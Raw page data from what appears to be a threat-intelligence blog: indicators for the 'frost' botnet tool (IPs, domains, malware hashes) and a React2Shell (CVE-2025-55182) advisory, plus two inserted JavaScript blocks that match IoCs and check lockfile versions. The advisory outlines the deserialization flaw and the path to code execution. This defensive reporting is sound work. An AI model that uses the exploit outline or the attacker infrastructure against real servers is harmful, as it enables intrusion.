The analysis in this blog draws directly on those capabilities: Canary Intelligence surfaced the selective exploitation behavior, EVI linked the CVEs to known botnets, and IP Intelligence identified the actual population of exposed hosts.",[18,24870,24871,24872,1246,24877,982,24882,59],{},"For more research like this check out our blogs, ",[1131,24873,24874],{},[47,24875,10793],{"href":10789,"rel":24876},[51],[1131,24878,24879],{},[47,24880,10801],{"href":10796,"rel":24881},[51],[1131,24883,24884],{},[47,24885,24026],{"href":24024,"rel":24886},[51],[18,24888,1228,24889,1234,24892,1240,24895,1246,24898,1246,24901,1255,24904,1260],{},[47,24890,1233],{"href":10806,"rel":24891},[51],[47,24893,1239],{"href":1237,"rel":24894},[51],[47,24896,1245],{"href":1243,"rel":24897},[51],[47,24899,1251],{"href":1249,"rel":24900},[51],[47,24902,283],{"href":281,"rel":24903},[51],[47,24905,216],{"href":1258,"rel":24906},[51],[1920,24908,24910],{"id":24909},"indicators","Indicators",[61,24912,23038],{"id":24913},"ip-addresses",[22,24915,24916,24921],{},[25,24917,24918,24920],{},[886,24919,23135],{}," - Scanning, exploitation, and hosting",[25,24922,24923,24925],{},[886,24924,24823],{}," - Potentially related scanning",[61,24927,24928],{"id":5931},"Domains",[22,24930,24931,24935,24939],{},[25,24932,24933],{},[886,24934,24801],{},[25,24936,24937],{},[886,24938,24804],{},[25,24940,24941],{},[886,24942,24807],{},[61,24944,24946],{"id":24945},"hashes-sha-1","Hashes (SHA-1)",[22,24948,24949,24957,24965,24973,24981,24989,24997,25005,25013],{},[25,24950,24951,24952],{},"frost.armv7: ",[47,24953,24956],{"href":24954,"rel":24955},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F3d9f01f9423cfa7912a40dc0f8eb6698a680573ede781881500dcbc7096b2d70\u002Fdetails",[51],"6e61651d0e2e3d13f769e05659cc2613f9a3a52a",[25,24958,24959,24960],{},"frost.armv6: 
",[47,24961,24964],{"href":24962,"rel":24963},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fda34c6140760e0e3d2a4f37fedb444947d729e9d6ebd054f3929a46cf6fa35c8\u002Fdetails",[51],"c467e605b4c7c4a6a9aedda2cee63f6fa501e9cc",[25,24966,24967,24968],{},"frost.armv5: ",[47,24969,24972],{"href":24970,"rel":24971},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F6aec0b1719f05151fd630f7c8f4d5d5ff08c389b2d2738fe27341cd0fbb413af\u002Fdetails",[51],"cb112935934a8b32459adccab119391df480c75e",[25,24974,24975,24976],{},"frost.mips: ",[47,24977,24980],{"href":24978,"rel":24979},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fcb988ee37b049e1c665607a2e09ec3f8c24f9002b7981aea69fd04ef37d6b7ac\u002Fdetails",[51],"a7957d96f4d8c5e801106281e85afd889d369850",[25,24982,24983,24984],{},"frost.mipsel: ",[47,24985,24988],{"href":24986,"rel":24987},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F8d681c267e5ca2f16e65d6abc4db69d7b89a9c410ee17641df875115abe63c80\u002Fdetails",[51],"e6f9789322a55f721b8e8a21812912e0a3de6703",[25,24990,24991,24992],{},"frost.aarch64: ",[47,24993,24996],{"href":24994,"rel":24995},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F846ae4259d4b361d9c4687f19f5c0c341c89c75580f6331c38348a750ced728a\u002Fdetails",[51],"712d90530ad71f344199db3a0a9bea696db5cfae",[25,24998,24999,25000],{},"frost.armv7b: ",[47,25001,25004],{"href":25002,"rel":25003},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F9e4c07975a08955f2cb3cc4fbbea70b52f7052098311d50bb946ffd257921a85\u002Fdetails",[51],"d0725253dc39a57049ea48e2a8c9316b7ee5159e",[25,25006,25007,25008],{},"frost.x86: ",[47,25009,25012],{"href":25010,"rel":25011},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Ffd6556974a56cf76b2cb4b898109e62f3a35bb4f6b92b4bca3e5808d4b36a095\u002Fdetails",[51],"f0b6bdb895918e5b27eef96f4c77f11351875028",[25,25014,25015,25016],{},"frost.x86_64: 
",[47,25017,25020],{"href":25018,"rel":25019},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fbb77b0a07a310a47af7ef0463f79ec19fd8aa6dbb887aa69e35f30bdc6346ece\u002Fdetails",[51],"b7b79f6b41b2cde4dad8a8b7269eea5e11d43751",[2901,25022,25023],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: 
var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":25025},[25026,25027,25028],{"id":24913,"depth":220,"text":23038},{"id":5931,"depth":220,"text":24928},{"id":24945,"depth":220,"text":24946},"2025-12-04","New CVE-2025-2611 attacks led us to a selective exploitation tool named frost that only fires when targets match precise fingerprints. 
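As an added example that is not VulnCheck's tooling, the following JavaScript matches the frost indicators listed above (the three domains, the possibly related host 176.65.148.246, the `220 meow :3` banner, and the per-architecture SHA-1 and SHA-256 hashes from the VirusTotal links) against free-form log lines. The indicator values are copied from the post; the primary operator IP is left out here because it is referenced, not spelled out, in this section. The tokeniser, the matching rules and the sample log lines are constructed for this example, and domains are matched exactly rather than by suffix because strangled.net, jumpingcrab.com and ignorelist.com are shared dynamic-DNS zones.

```javascript
// Added example (not VulnCheck's code): match frost IoCs against log lines.
// Indicator values copied from the post; everything else is constructed here.

const FROST_SAMPLES = [
  { name: "frost.armv7",   sha1: "6e61651d0e2e3d13f769e05659cc2613f9a3a52a", sha256: "3d9f01f9423cfa7912a40dc0f8eb6698a680573ede781881500dcbc7096b2d70" },
  { name: "frost.armv6",   sha1: "c467e605b4c7c4a6a9aedda2cee63f6fa501e9cc", sha256: "da34c6140760e0e3d2a4f37fedb444947d729e9d6ebd054f3929a46cf6fa35c8" },
  { name: "frost.armv5",   sha1: "cb112935934a8b32459adccab119391df480c75e", sha256: "6aec0b1719f05151fd630f7c8f4d5d5ff08c389b2d2738fe27341cd0fbb413af" },
  { name: "frost.mips",    sha1: "a7957d96f4d8c5e801106281e85afd889d369850", sha256: "cb988ee37b049e1c665607a2e09ec3f8c24f9002b7981aea69fd04ef37d6b7ac" },
  { name: "frost.mipsel",  sha1: "e6f9789322a55f721b8e8a21812912e0a3de6703", sha256: "8d681c267e5ca2f16e65d6abc4db69d7b89a9c410ee17641df875115abe63c80" },
  { name: "frost.aarch64", sha1: "712d90530ad71f344199db3a0a9bea696db5cfae", sha256: "846ae4259d4b361d9c4687f19f5c0c341c89c75580f6331c38348a750ced728a" },
  { name: "frost.armv7b",  sha1: "d0725253dc39a57049ea48e2a8c9316b7ee5159e", sha256: "9e4c07975a08955f2cb3cc4fbbea70b52f7052098311d50bb946ffd257921a85" },
  { name: "frost.x86",     sha1: "f0b6bdb895918e5b27eef96f4c77f11351875028", sha256: "fd6556974a56cf76b2cb4b898109e62f3a35bb4f6b92b4bca3e5808d4b36a095" },
  { name: "frost.x86_64",  sha1: "b7b79f6b41b2cde4dad8a8b7269eea5e11d43751", sha256: "bb77b0a07a310a47af7ef0463f79ec19fd8aa6dbb887aa69e35f30bdc6346ece" },
];
const FROST_DOMAINS = ["krebs.strangled.net", "mreow.jumpingcrab.com", "xlab.ignorelist.com"];
const FROST_IPS = ["176.65.148.246"]; // possibly related host; add the primary IP from the post
const FROST_BANNER = "220 meow :3";

// Index hashes once; matching is case-insensitive and works for SHA-1 or SHA-256.
const HASH_INDEX = new Map();
for (const s of FROST_SAMPLES) {
  HASH_INDEX.set(s.sha1.toLowerCase(), { type: "sha1", sample: s.name });
  HASH_INDEX.set(s.sha256.toLowerCase(), { type: "sha256", sample: s.name });
}
const DOMAIN_INDEX = new Set(FROST_DOMAINS.map((d) => d.toLowerCase()));
const IP_INDEX = new Set(FROST_IPS);

// Token extractors: 64-hex is tried before 40-hex so a SHA-256 is not split.
const HEX_RE = /\b(?:[0-9a-fA-F]{64}|[0-9a-fA-F]{40})\b/g;
const HOST_RE = /\b(?:[a-z0-9-]+\.)+[a-z]{2,}\.?/gi;
const IP_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;

// Return every indicator hit found in one log line.
function matchLine(line) {
  const hits = [];
  for (const tok of line.match(HEX_RE) || []) {
    const hit = HASH_INDEX.get(tok.toLowerCase());
    if (hit) hits.push({ indicator: tok.toLowerCase(), type: hit.type, sample: hit.sample });
  }
  for (const tok of line.match(HOST_RE) || []) {
    const host = tok.toLowerCase().replace(/\.$/, ""); // normalise case and trailing dot
    if (DOMAIN_INDEX.has(host)) hits.push({ indicator: host, type: "domain" });
  }
  for (const tok of line.match(IP_RE) || []) {
    if (IP_INDEX.has(tok)) hits.push({ indicator: tok, type: "ip" });
  }
  if (line.includes(FROST_BANNER)) hits.push({ indicator: FROST_BANNER, type: "banner" });
  return hits;
}

// Scan an array of lines, tagging each hit with its 1-based line number.
function scanLog(lines) {
  const out = [];
  lines.forEach((line, i) => {
    for (const h of matchLine(line)) out.push({ line: i + 1, ...h });
  });
  return out;
}

// Constructed sample lines (DNS, EDR file events, a TCP connection log); not real telemetry.
const SAMPLE_LOG = [
  "2025-12-01T10:02:11Z dns query client=10.0.0.21 qname=KREBS.STRANGLED.NET. qtype=A",
  `2025-12-01T10:02:13Z edr file_written path=/tmp/.f/frost.mips sha1=${FROST_SAMPLES[3].sha1.toUpperCase()}`,
  `2025-12-01T10:02:13Z edr file_written path=/tmp/.f/frost.x86_64 sha256=${FROST_SAMPLES[8].sha256}`,
  `2025-12-01T10:03:40Z tcp connect dst=176.65.148.246 banner="${FROST_BANNER}"`,
  "2025-12-01T10:04:00Z dns query client=10.0.0.22 qname=www.example.com. qtype=A",
  "2025-12-01T10:04:05Z dns query client=10.0.0.23 qname=other.strangled.net. qtype=A",
];

if (typeof require !== "undefined" && require.main === module) {
  for (const h of scanLog(SAMPLE_LOG)) console.log(JSON.stringify(h));
}
```

The last sample line shows why the domain match is exact: a different host under the same dynamic-DNS zone produces no hit, which avoids flagging unrelated users of strangled.net.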
VulnCheck's Canary Intelligence, EVI, and IP Intel exposed the CVEs involved, the operator's infrastructure, and the internet-exposed systems they can reach.",{"slug":25032},"frost-checks-first","\u002Fblog\u002Ffrost-checks-first",{"title":20129,"description":25030},"blog\u002Ffrost-checks-first",[2941,242,1279,23275],"8YL7I02HqXSSX6KR2D8ZFrQ1IKNlkck43GRzQhUuPjs",{"id":25039,"title":25040,"articles":25041,"authors":25070,"body":25072,"date":25045,"description":25500,"extension":234,"image":7,"link":7,"meta":25501,"navigation":237,"path":25503,"seo":25504,"series":7,"stem":25505,"subtype":7,"tags":25506,"__hash__":25507},"blog\u002Fblog\u002Fcve-2025-55182-react-nextjs.md","Critical vulnerability in React and Next.js (CVE-2025-55182)",[25042,25046,25050,25054,25058,25061,25064,25067],{"title":25043,"source":11228,"link":25044,"date":25045},"Developers scramble as critical React flaw threatens major apps","https:\u002F\u002Fcyberscoop.com\u002Freact-server-vulnerability-critical-severity-security-update\u002F","2025-12-03",{"title":25047,"source":25048,"link":25049,"date":25029},"Act now! 
Aussie cyber agency issues urgent warning over critical React vulnerability","Cyber Daily","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F12973-act-now-aussie-cyber-agency-issues-urgent-warning-over-critical-react-vulnerability",{"title":25051,"source":11228,"link":25052,"date":25053},"Attackers hit React defect as researchers quibble over proof","https:\u002F\u002Fcyberscoop.com\u002Fattackers-exploit-react-server-vulnerability\u002F","2025-12-05",{"title":25055,"source":14382,"link":25056,"date":25057},"Critical React2Shell Flaw Added to CISA KEV After Confirmed Active Exploitation","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fcritical-react2shell-flaw-added-to-cisa.html","2025-12-06",{"title":25059,"source":12157,"link":25060,"date":23681},"Risky Bulletin: APTs go after the React2Shell vulnerability within hours","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-apts-go-after-the-react2shell-vulnerability-within-hours\u002F",{"title":25062,"source":14382,"link":25063,"date":23681},"⚡ Weekly Recap: USB Malware, React2Shell, WhatsApp Worms, AI IDE Bugs & More","https:\u002F\u002Fthehackernews.com\u002F2025\u002F12\u002Fweekly-recap-usb-malware-react2shell.html",{"title":25065,"source":11218,"link":25066,"date":23681},"Exploitation Activity Ramps Up Against React2Shell","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fexploitation-activity-ramps-react2shell",{"title":25068,"source":23286,"link":25069,"date":22718},"Exploitation Efforts Against Critical React2Shell Flaw 
Accelerate","https:\u002F\u002Fsecurityboulevard.com\u002F2025\u002F12\u002Fexploitation-efforts-against-critical-react2shell-flaw-accelerate\u002F",[25071],{"name":256,"avatar":257,"link":258,"linkName":20001},{"type":15,"value":25073,"toc":25489},[25074,25118,25120,25133,25139,25143,25152,25164,25168,25176,25193,25215,25240,25243,25254,25271,25275,25278,25305,25312,25316,25319,25328,25344,25369,25402,25405,25411,25414,25418,25421,25455,25458,25460,25472],[22,25075,25076,25082,25085,25098],{},[25,25077,25078,25081],{},[47,25079,10533],{"href":10531,"rel":25080},[51],", also known as React2Shell, is a CVSS 10 remote code execution vulnerability in React Server Components and Next.js that was disclosed on December 3, 2025.",[25,25083,25084],{},"VulnCheck's research team has confirmed the vulnerability is exploitable for unauthenticated RCE in default Next.js apps, which are expected to be the main attack vector(s).",[25,25086,25087,25088,25092,25093,25097],{},"Multiple proof-of-concept RCE ",[47,25089,25091],{"href":22131,"rel":25090},[51],"exploits"," became publicly ",[47,25094,25096],{"href":22088,"rel":25095},[51],"available"," on December 4, at which time VulnCheck and others began seeing widespread opportunistic exploitation. 
VulnCheck's canary network has since detected thousands of exploit attempts.",[25,25099,25100,25101,25106,25107,1246,25112,25117],{},"On December 11, two additional ",[47,25102,25105],{"href":25103,"rel":25104},"https:\u002F\u002Freact.dev\u002Fblog\u002F2025\u002F12\u002F11\u002Fdenial-of-service-and-source-code-exposure-in-react-server-components",[51],"vulnerabilities"," were disclosed (",[47,25108,25111],{"href":25109,"rel":25110},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-55183",[51],"CVE-2025-55183",[47,25113,25116],{"href":25114,"rel":25115},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-55184",[51],"CVE-2025-55184",") in React Server Components; neither of these vulnerabilities results in remote code execution.",[61,25119,11273],{"id":11272},[18,25121,25122,25123,25126,25127,25132],{},"On December 3, 2025, React developers disclosed ",[47,25124,10533],{"href":10531,"rel":25125},[51],", an unauthenticated remote code execution vulnerability with a CVSS score of 10 that was reported to the vendor on November 29, only four days before it was fixed. CVE-2025-55182, nicknamed \"React2Shell,\" ultimately arises from an unsafe deserialization issue in React Server Components, specifically ",[47,25128,25131],{"href":25129,"rel":25130},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Fpull\u002F35277\u002Ffiles",[51],"React Flight",". When a server receives a specially crafted React Flight payload, the internal deserialization logic performs insufficient validation of its structure. By exploiting this weakness, an attacker can cause React to misinterpret attacker-controlled values as internal references or objects. 
This permits unintended server-side behaviors and can lead to the execution of server-privileged code paths within the React Server Components runtime.",[18,25134,25135],{},[68,25136],{":width":10862,"alt":25137,"src":25138},"NextJS CVE-2025-55182","blog\u002Fnextjs-cve-2025-55182\u002Fcve-2025-55182-console.png",[993,25140,25142],{"id":25141},"exploitation-in-the-wild","Exploitation in the wild",[18,25144,25145,25146,25151],{},"The vulnerability wasn't known to be exploited in the wild at the time of disclosure, but exploit attempts began shortly after a public PoC was released on December 4. VulnCheck's Canary Intelligence network began detecting exploitative (malicious) scanning on December 4. Amazon has also reported seeing ",[47,25147,25150],{"href":25148,"rel":25149},"https:\u002F\u002Faws.amazon.com\u002Fblogs\u002Fsecurity\u002Fchina-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182\u002F",[51],"exploit attempts"," by China-nexus threat groups, including Earth Lamia and Jackpot Panda.",[18,25153,25154,25157,25158,25163],{},[295,25155,25156],{},"Saturday, December 6 update:"," VulnCheck's canaries are now seeing hundreds of exploit attempts. 
Broad, opportunistic scanning and exploitation are ongoing, and Vercel is ",[47,25159,25162],{"href":25160,"rel":25161},"https:\u002F\u002Fvercel.com\u002Fblog\u002Fresources-for-protecting-against-react2shell",[51],"offering"," large bounties for anyone who reports successful WAF bypasses.",[61,25165,25167],{"id":25166},"whats-affected","What’s affected?",[18,25169,25170,25171,25175],{},"Per the React team’s ",[47,25172,5359],{"href":25173,"rel":25174},"https:\u002F\u002Freact.dev\u002Fblog\u002F2025\u002F12\u002F03\u002Fcritical-security-vulnerability-in-react-server-components",[51],", the vulnerability is present in versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:",[22,25177,25178,25183,25188],{},[25,25179,25180],{},[886,25181,25182],{},"react-server-dom-webpack",[25,25184,25185],{},[886,25186,25187],{},"react-server-dom-parcel",[25,25189,25190],{},[886,25191,25192],{},"react-server-dom-turbopack",[18,25194,25195,25196,1246,25201,1255,25206,25211,25212],{},"The issue is fixed in versions ",[47,25197,25200],{"href":25198,"rel":25199},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Freleases\u002Ftag\u002Fv19.0.1",[51],"19.0.1",[47,25202,25205],{"href":25203,"rel":25204},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Freleases\u002Ftag\u002Fv19.1.2",[51],"19.1.2",[47,25207,25210],{"href":25208,"rel":25209},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Freleases\u002Ftag\u002Fv19.2.1",[51],"19.2.1"," of React. ",[295,25213,25214],{},"Fixes should be applied on an emergency basis, as widespread exploit attempts are likely.",[18,25216,25217,25218,1246,25221,1246,25223,1246,25225,1246,25228,1255,25231,25234,25235,25239],{},"Known affected React frameworks and bundlers are as follows, but note that this list is likely to grow: ",[886,25219,25220],{},"next",[886,25222,21356],{},[886,25224,21430],{},[886,25226,25227],{},"@parcel\u002Frsc",[886,25229,25230],{},"@vitejs\u002Fplugin-rsc",[886,25232,25233],{},"rwsdk",". 
See the ",[47,25236,25238],{"href":25173,"rel":25237},[51],"React blog"," for the latest information on affected frameworks and components.",[18,25241,25242],{},"The React blog explicitly notes that (emphasis ours):",[1925,25244,25245],{},[18,25246,25247,25248,25250,25251,25253],{},"If your app’s React code does not use a server, your app is ",[295,25249,6881],{}," affected by this vulnerability. If your app does not use a framework, bundler, or bundler plugin that supports React Server Components, your app is ",[295,25252,6881],{}," affected by this vulnerability.",[18,25255,25256,25257,25261,25262,25264,25265,25270],{},"The Next.js team similarly has a security bulletin ",[47,25258,305],{"href":25259,"rel":25260},"https:\u002F\u002Fgithub.com\u002Fvercel\u002Fnext.js\u002Fsecurity\u002Fadvisories\u002FGHSA-9qr9-h5gf-34mp",[51]," advising users of stable 15.x and 16.x version streams to update to a fixed version immediately. Fixed versions of Next.js are 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, and 16.0.7. 
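As an added example that is neither VulnCheck's nor the React or Next.js teams' code, the following JavaScript turns the version lists stated in the advisories above into a check that can be run over an npm lockfile: React Server Components packages at 19.0.0, 19.1.0, 19.1.1 and 19.2.0 are vulnerable to CVE-2025-55182 and fixed at 19.0.1, 19.1.2 and 19.2.1, and Next.js 15.x/16.x is fixed at 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 and 16.0.7. It also flags the versions the later React advisory lists as affected by CVE-2025-55183 and CVE-2025-55184 (which include the 55182-patched releases). The semver parsing, the lockfile walk and the sample lockfile are this example's own constructions; pre-release builds and version streams the advisories do not name are reported as unknown rather than guessed.

```javascript
// Added example (not VulnCheck's or the React/Next.js teams' code): classify
// installed versions against the advisory version lists quoted in the post.

const RSC_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);

// CVE-2025-55182: first fixed patch per 19.x minor stream (19.0.1, 19.1.2, 19.2.1).
const RSC_FIRST_FIXED_PATCH = { 0: 1, 1: 2, 2: 1 };

// CVE-2025-55183 / CVE-2025-55184: versions the React advisory lists as affected.
const RSC_LATER_CVE_AFFECTED = new Set([
  "19.0.0", "19.0.1", "19.1.0", "19.1.1", "19.1.2", "19.2.0", "19.2.1",
]);

// Next.js: first fixed patch per stable minor stream named in the advisory.
const NEXT_FIRST_FIXED_PATCH = {
  "15.0": 5, "15.1": 9, "15.2": 6, "15.3": 6, "15.4": 8, "15.5": 7, "16.0": 7,
};

// Minimal semver parser: MAJOR.MINOR.PATCH with optional pre-release; build metadata ignored.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$/.exec(String(v).trim());
  if (!m) return null;
  return { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null };
}

// Status of a react-server-dom-* version for CVE-2025-55182 and the two follow-on CVEs.
function assessReactServerDom(version) {
  const s = parseSemver(version);
  if (!s) return { cve55182: "unknown", laterCves: "unknown" };
  let cve55182;
  if (s.major !== 19) cve55182 = "not-listed";                        // only 19.x is named
  else if (s.pre) cve55182 = "unknown";                               // canary/experimental: check upstream
  else if (!(s.minor in RSC_FIRST_FIXED_PATCH)) cve55182 = "unknown"; // minor not covered by the advisory
  else cve55182 = s.patch < RSC_FIRST_FIXED_PATCH[s.minor] ? "vulnerable" : "fixed";
  const bare = `${s.major}.${s.minor}.${s.patch}`;
  const laterCves = s.pre ? "unknown" : (RSC_LATER_CVE_AFFECTED.has(bare) ? "listed-affected" : "not-listed");
  return { cve55182, laterCves };
}

// Status of a Next.js version for CVE-2025-55182, by stable minor stream.
function assessNext(version) {
  const s = parseSemver(version);
  if (!s || s.pre) return "unknown";
  const stream = `${s.major}.${s.minor}`;
  if (!(stream in NEXT_FIRST_FIXED_PATCH)) return "unknown"; // stream not named in the advisory
  return s.patch < NEXT_FIRST_FIXED_PATCH[stream] ? "vulnerable" : "fixed";
}

// Walk the "packages" map of an npm lockfile (lockfileVersion 2/3); keys are install
// paths such as "node_modules/next" or "node_modules/a/node_modules/b" (nested copies).
function scanLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const idx = path.lastIndexOf("node_modules/");
    if (idx < 0) continue; // the root project entry ("")
    const name = path.slice(idx + "node_modules/".length);
    const version = entry && entry.version;
    if (name === "next") {
      findings.push({ path, name, version, cve55182: assessNext(version) });
    } else if (RSC_PACKAGES.has(name)) {
      findings.push({ path, name, version, ...assessReactServerDom(version) });
    }
  }
  return findings;
}

// Constructed sample lockfile (not from any real project).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", version: "0.1.0" },
    "node_modules/next": { version: "15.5.6" },
    "node_modules/react-server-dom-webpack": { version: "19.2.0" },
    "node_modules/some-tool/node_modules/react-server-dom-turbopack": { version: "19.2.1" },
    "node_modules/react-server-dom-parcel": { version: "19.3.0-canary-abc123" },
  },
};

if (typeof require !== "undefined" && require.main === module) {
  for (const f of scanLockfile(SAMPLE_LOCK)) console.log(JSON.stringify(f));
}
```

Checking the lockfile rather than package.json matters because nested copies (the `some-tool/node_modules/...` path above) are what actually run, and a "fixed" verdict for 55182 still carries a `listed-affected` flag for the later DoS and source-exposure CVEs.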
",[1131,25263,13825],{}," The vulnerability was initially tracked in Next.js as ",[47,25266,25269],{"href":25267,"rel":25268},"https:\u002F\u002Fwww.cve.org\u002FCVERecord?id=CVE-2025-66478",[51],"CVE-2025-66478",", but that CVE identifier was rejected as a duplicate of CVE-2025-55182.",[993,25272,25274],{"id":25273},"follow-on-cves","Follow-on CVEs",[18,25276,25277],{},"On December 11, React developers announced two additional CVEs affecting React Server Components, neither of which results in remote code execution:",[22,25279,25280,25290,25296],{},[25,25281,25282,25285,25286,25289],{},[47,25283,25111],{"href":25109,"rel":25284},[51]," is an information leak vulnerability \"in specific configurations of React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1\" that allows for source code exposure of any Server Function; per the ",[47,25287,5359],{"href":25103,"rel":25288},[51],", exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument.",[25,25291,25292,25295],{},[47,25293,25116],{"href":25114,"rel":25294},[51]," is a deserialization vulnerability that allows for pre-authentication denial of service (DoS) in React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1.",[25,25297,25298,25299,1246,25301,1255,25303,59],{},"Vulnerable packages for both vulnerabilities include ",[886,25300,25187],{},[886,25302,25192],{},[886,25304,25182],{},[18,25306,25307,25308,59],{},"For the latest information, please see ",[47,25309,25311],{"href":25103,"rel":25310},[51],"React's blog here",[61,25313,25315],{"id":25314},"vulncheck-rce-analysis","VulnCheck RCE analysis",[18,25317,25318],{},"Next.js includes a general mechanism for handling React Server Actions, which relies on React’s server-side Flight deserializer. 
In our testing for CVE-2025-55182, this deserialization logic appears to be reachable by default, without requiring the presence of user-defined Server Actions or any route-specific discovery. This is a result of the fact that Next.js uses server-side rendering (SSR) by default in vulnerable versions.",[18,25320,25321,25322,25325,25326,59],{},"CVE-2025-55182 stems from the use of the React Flight Protocol and the BusBoy HTTP handling library interacting with SSR in vulnerable Next.js applications. The React Flight Protocol handles SSR requests in a chunked manner, which enables React to incrementally update modified components from the SSR processing, and also allows chunks to reference each other. Before the vulnerability was patched, the React Flight Protocol did not validate that the object references were set to the correct object, which allows for the prototype to be reached from the Flight Protocol. Interestingly, the first chunk request also allows for the ",[886,25323,25324],{},"then"," function constructor to be overridden and directly called by ",[886,25327,16115],{},[18,25329,25330,25331,25334,25335,982,25337,25339,25340,25343],{},"Using the classic ",[886,25332,25333],{},"constructor.constructor"," trick, it is then possible to combine the previous ",[886,25336,25324],{},[886,25338,16115],{}," components to reach ",[886,25341,25342],{},"[native code]"," JavaScript generation. 
